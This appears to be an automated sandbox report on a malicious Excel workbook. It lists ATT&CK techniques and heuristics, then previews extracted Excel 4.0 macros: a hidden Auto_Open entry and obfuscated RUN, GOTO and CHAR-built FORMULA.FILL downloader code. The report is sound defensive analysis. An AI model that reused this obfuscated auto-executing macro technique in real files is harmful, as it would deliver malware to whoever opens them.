MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open defined name, which is a known method for executing arbitrary code. The macros utilize dangerous formula APIs such as RUN and SET.VALUE, suggesting an intent to download and execute a secondary payload. The specific functions used point towards a macro-based downloader.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 130585 bytes |
SHA-256: 97c3e4918a2e7e7c16a7412de0ba91e15a1a1b111febaeea9a580d663f3ebc69 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!EH17079 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,S19,"",0.67222222222222216548 ' Sheet,JN38,"",2869.00000000000000000000 ' Sheet,BE93,"",-2799.00000000000000000000 ' Sheet,EX110,"SET.VALUE(HC46079,363/5)","" ' Sheet,EX111,GOTO(BJ51366),"" ' Sheet,CW173,"",-28.81318681318681385051 ' Sheet,EJ188,"",147.40007812499999317879 ' Sheet,HW200,"",-2.37362637362637363125 ' Sheet,HE228,"",453.50000000000000000000 ' Sheet,EF260,"",-1.41025641025641035320 ' Sheet,JH331,"",-1.15882352941176458572 ' Sheet,CQ334,"",198.00000000000000000000 ' Sheet,GR339,"",2852.00000000000000000000 ' Sheet,GI353,"SET.VALUE(JH23972,GET.CELL(50,DI58290)+-368.00000000000000000000-4)","" ' Sheet,GI354,RUN(IL49025),"" ' Sheet,JF473,"",0.19578947368421051323 ' Sheet,GR536,"",-0.21311475409836064254 ' Sheet,JU559,"",-0.41417910447761191461 ' Sheet,CZ594,"",-0.83870967741935487094 ' Sheet,EX598,"",6.88405797101449312692 ' Sheet,DZ630,"",-5.50746268656716431167 ' Sheet,H635,"",404.00000000000000000000 ' Sheet,CZ663,"",-0.44262295081967212296 ' Sheet,EZ675,"",0.07960199004975124226 ' Sheet,JG757,"",-6.10000488281249975131 ' Sheet,JJ774,"",429.00000000000000000000 ' Sheet,JQ779,"",431.00000000000000000000 ' Sheet,BX824,"",322.00000000000000000000 ' Sheet,CB949,"",-2.16666666666666651864 ' Sheet,EB973,"",0.67850467289719618158 ' Sheet,FP989,"",-6.70000488281250028422 ' Sheet,BJ1047,"",285.00000000000000000000 ' Sheet,FJ1066,"",313.00000000000000000000 ' Sheet,G1158,"",-98.75000000000000000000 ' Sheet,CW1163,"",265.00000000000000000000 ' Sheet,JF1171,"",-18.75000000000000000000 ' Sheet,M1225,"",-30.75000000000000000000 ' Sheet,CZ1274,"",0.02714776632302405568 ' Sheet,FI1307,"",0.31272727272727274261 ' Sheet,BE1308,"",-293.00000000000000000000 ' Sheet,GR1403,"",-3.13043478260869578733 ' Sheet,IX1409,"",-32.77501953125000255795 ' Sheet,GG1415,"",314.00000000000000000000 ' Sheet,FC1441,"",-2856.00000000000000000000 ' Sheet,HI1481,"",-315.00000000000000000000 ' Sheet,DO1483,"",-0.18852459016393441349 ' Sheet,JB1507,"",10.25510204081632714690 ' Sheet,ID1523,"",-247.00000000000000000000 ' Sheet,Q1556,"",-0.43032786885245899455 ' Sheet,EE1558,"",589.00000000000000000000 ' Sheet,F1621,"",-9.22500488281250063949 ' Sheet,DK1636,"",-309.00000000000000000000 ' Sheet,BE1658,"",-1.01025641025641021997 ' Sheet,IX1658,"",-0.37962962962962965019 ' Sheet,HT1692,"",214.00000000000000000000 ' Sheet,BD1800,"",-0.03127383676582761590 ' Sheet,ET1801,"FORMULA.FILL(CHAR(HR39641+G19229)&CHAR(DQ6366+DE21491)&CHAR(EK12587*EI24396)&CHAR(IF40813+IR28440)&CHAR(JC16649+BJ1047)&CHAR(EK12587*IU44129)&CHAR(JH23972*GJ51208)&CHAR(IF40813/DU63381)&CHAR(DQ6366/EN45003)&CHAR(JC16649+IX53149)&CHAR(DC38998/DL2681)&CHAR(IU35778+EB28757)&CHAR(DQ6366+IF21002)&CHAR(DO8517*HB46889)&CHAR(EA20210-Q37130)&CHAR(EK12587*FU61017)&CHAR(JH23972+GI36796)&CHAR(IF40813-FM35408)&CHAR(EA20210-DF64003)&CHAR(JH23972-GH4116)&CHAR(HR39641*FN20562)&CHAR(EA20210*DW51344),ET1802)","" ' Sheet,ET1803,GOTO(GO4355),"" ' Sheet,F1815,"",-0.40163934426229508379 ' Sheet,HS1841,"",-430.00000000000000000000 ' Sheet,EF1898,"",10.79545454545454497008 ' Sheet,HN1898,"",6.98529411764705887578 ' Sheet,GD1923,"",-0.41393442622950821219 ' Sheet,HM1942,"",134.50000000000000000000 ' Sheet,CV1981,"FORMULA.FILL(CHAR(DU57124+Q41384)&CHAR(DQ22215+HW12711)&CHAR(JF7021/FD41122)&CHAR(DJ27233/T34888)&CHAR(DQ22215+FB39865)&CHAR(JS22779+H53258)&CHAR(JP52329-HV39723)&CHAR(DQ22215-Z4771)&CHAR(P20963+JK61516)&CHAR(JP52329*HO55806)&CHAR(HC46079/S19)&CHAR(JP52329+BV39906)&CHAR(DJ27233/CA45189)&CHAR(HC46079/EB973)&CHAR(DJ27233+FA52414)&CHAR(CB27422/ED26759)&CHAR ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.